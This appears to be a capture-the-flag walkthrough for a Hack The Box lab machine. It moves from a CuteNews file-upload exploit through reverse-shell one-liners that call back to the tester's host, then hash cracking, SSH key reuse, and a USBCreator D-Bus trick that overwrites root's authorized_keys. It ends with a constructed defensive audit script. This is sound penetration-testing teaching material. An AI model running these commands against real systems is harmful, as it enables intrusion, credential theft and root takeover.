What will we do?
As usual, we have some steps which we follow to pwn any machine; our steps are:
- Recon / Information gathering
- Gaining Access
- Maintaining Access
- Reporting / Analysis
After finishing these steps we will have all of this information; stay calm and keep reading :)
1. Information Gathering
In this step we aim to collect all the information we can about a specific target, like its open ports, the security mode of its login systems, directories, OS version, service versions, etc.
We will start this step by scanning all ports to discover the open ports and learn where we can get into this machine.
nmap -sS -sV -T4 -O 10.10.10.206
We have only 2 open ports, 22 and 80, so we will start by scanning the website on port 80.
I've already searched for any public exploit for this version of Apache, but there's no interesting exploit.
We have a template website and we don't find any interesting information, and if you notice in the upper right corner no redirection happened, so we will start checking the source code.
We have a CuteNews directory, and after searching about it I found that it's a CMS (Content Management System).
Let’s try to access it
We have a login portal, and the version of the CMS is
Let’s try to search for any public exploit for this version
We have an authenticated arbitrary file upload vulnerability, and for
We also have the exploit code, CVE-2019-11447, which requires us to be authenticated.
In this step we aim to go through all the information collected in the previous one.
So, create an account and try to execute it.
It uploads a PHP file which executes the cmd content on the system; let's try to access the file directory and execute a reverse shell.
As you can see, when I entered whoami it was executed on the server, so we have OS command injection; let's try to open a shell from this variable.
3. Gaining Access
nc 10.10.xx.xx 1234 -e /bin/bash or
bash -i >& /dev/tcp/10.10.xx.xx/1234 0>&1 and encode it as
After executing it on the server and listening on the specified port using
I've gained a shell :)
Let’s try to escalate our privileges to have another user role or privileges.
4. Maintaining Access
Let’s check the files of
We have multiple PHP files; we can start by scanning the ones with larger sizes, because they may contain juicy information.
For these 2 files we have base64 code which we need to decode using any online or offline tool:
echo "the_encoded_text_here" | base64 -d
After decoding it we have passwords for nadav, but they're hashed.
First we need to identify the hash type using Hash Analyzer.
Now we need to crack them using any online cracking tool, hashcat or john (the wordlist is a positional argument for hashcat; -w selects the workload profile, not the wordlist):
hashcat -m 1400 paul.hash rockyou.txt
The results are
We can also read the user.txt flag.
After that we need to get the second user.
By searching and enumerating the paul directory, I found the .ssh directory, which contains
There's a hint in the machine discussion saying that the 2 users share everything with each other.
So let's try to use it and log in as
It works, and we have only one step left to get the root account.
Running PsPy64 to see the system processes, I noticed that there's a process ibus which is executed periodically.
After searching for how to use it to open a shell, I found these 2 amazing resources.
The second blog is written by someone called Nadav, the machine creator.
Following the hacktricks enumeration steps and checking the D-Bus interfaces, I found that there's an interface called USBCreator which has privileges.
After some searching on how to use it to open a root shell, I found that you can use it to overwrite a file in the root user's directory, so I can generate my own rsa key and copy the public key to /root/.ssh/authorized_keys to be authenticated as root on the system.
Let's generate our rsa key and then copy the public one to the root directory.
Use this command to perform the transfer:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/eslam_rsa.pub /root/.ssh/authorized_keys true
Then try to access the root account using the private ssh key:
ssh -i id_rsa root@10.10.10.206
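From the defender's side, the two findings that chained into root here are an SSH key accepted by more than one account (paul's key also logging in as nadav) and the USBCreator service being registered on the system D-Bus. The audit below is an added example, not code from the writeup or from the box; the authorized_keys contents and the busctl-style listing are constructed samples, and it assumes `busctl list --system` output with the bus name in the first column.

```python
"""Constructed audit for key sharing across accounts and USBCreator exposure."""
from collections import defaultdict

# Constructed authorized_keys contents per account; the blobs are placeholders,
# not real keys. The same key is accepted by both "paul" and "nadav".
SAMPLE_AUTHORIZED_KEYS = {
    "paul": "ssh-rsa SAMPLEBLOB1 paul@passage\n",
    "nadav": "# nadav's keys\nssh-rsa SAMPLEBLOB1 paul@passage\n"
             "ssh-ed25519 SAMPLEBLOB2 nadav@passage\n",
}

# Constructed `busctl list --system` style output: header, then one name per line.
# Activatable services show '-' in the PID column, so they need not be running.
SAMPLE_BUS_LIST = """NAME                      PID PROCESS        USER
com.ubuntu.USBCreator       - -              -
org.freedesktop.login1    812 systemd-logind root
"""

KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def shared_keys(authorized):
    """Return {"<type> <blob>": [accounts]} for every key accepted by more than
    one account. Comment lines are skipped and option prefixes
    (e.g. command="...") before the key type are tolerated."""
    owners = defaultdict(set)
    for user, text in authorized.items():
        for line in text.splitlines():
            parts = line.split()
            idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPES)), None)
            if idx is None or idx + 1 >= len(parts):
                continue
            owners[(parts[idx], parts[idx + 1])].add(user)
    return {f"{t} {b}": sorted(u) for (t, b), u in owners.items() if len(u) > 1}


def exposed_bus_names(bus_list, watch=("com.ubuntu.USBCreator",)):
    """Return the watched bus names present in the busctl listing (assumed format)."""
    names = {ln.split()[0] for ln in bus_list.splitlines()[1:] if ln.strip()}
    return sorted(n for n in watch if n in names)


def audit(authorized=SAMPLE_AUTHORIZED_KEYS, bus_list=SAMPLE_BUS_LIST):
    """Collect both findings in one report dictionary."""
    return {"shared_keys": shared_keys(authorized),
            "exposed_bus_names": exposed_bus_names(bus_list)}


if __name__ == "__main__":
    for finding, value in audit().items():
        print(finding, "->", value)
```

On a real host, feed it the contents of each user's ~/.ssh/authorized_keys and the output of busctl list --system; a non-empty result in either field is what to remediate (remove the shared key, or remove/patch usb-creator and its D-Bus service).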
If you speak Arabic, you can watch my walkthrough, in which I explain all these steps, here.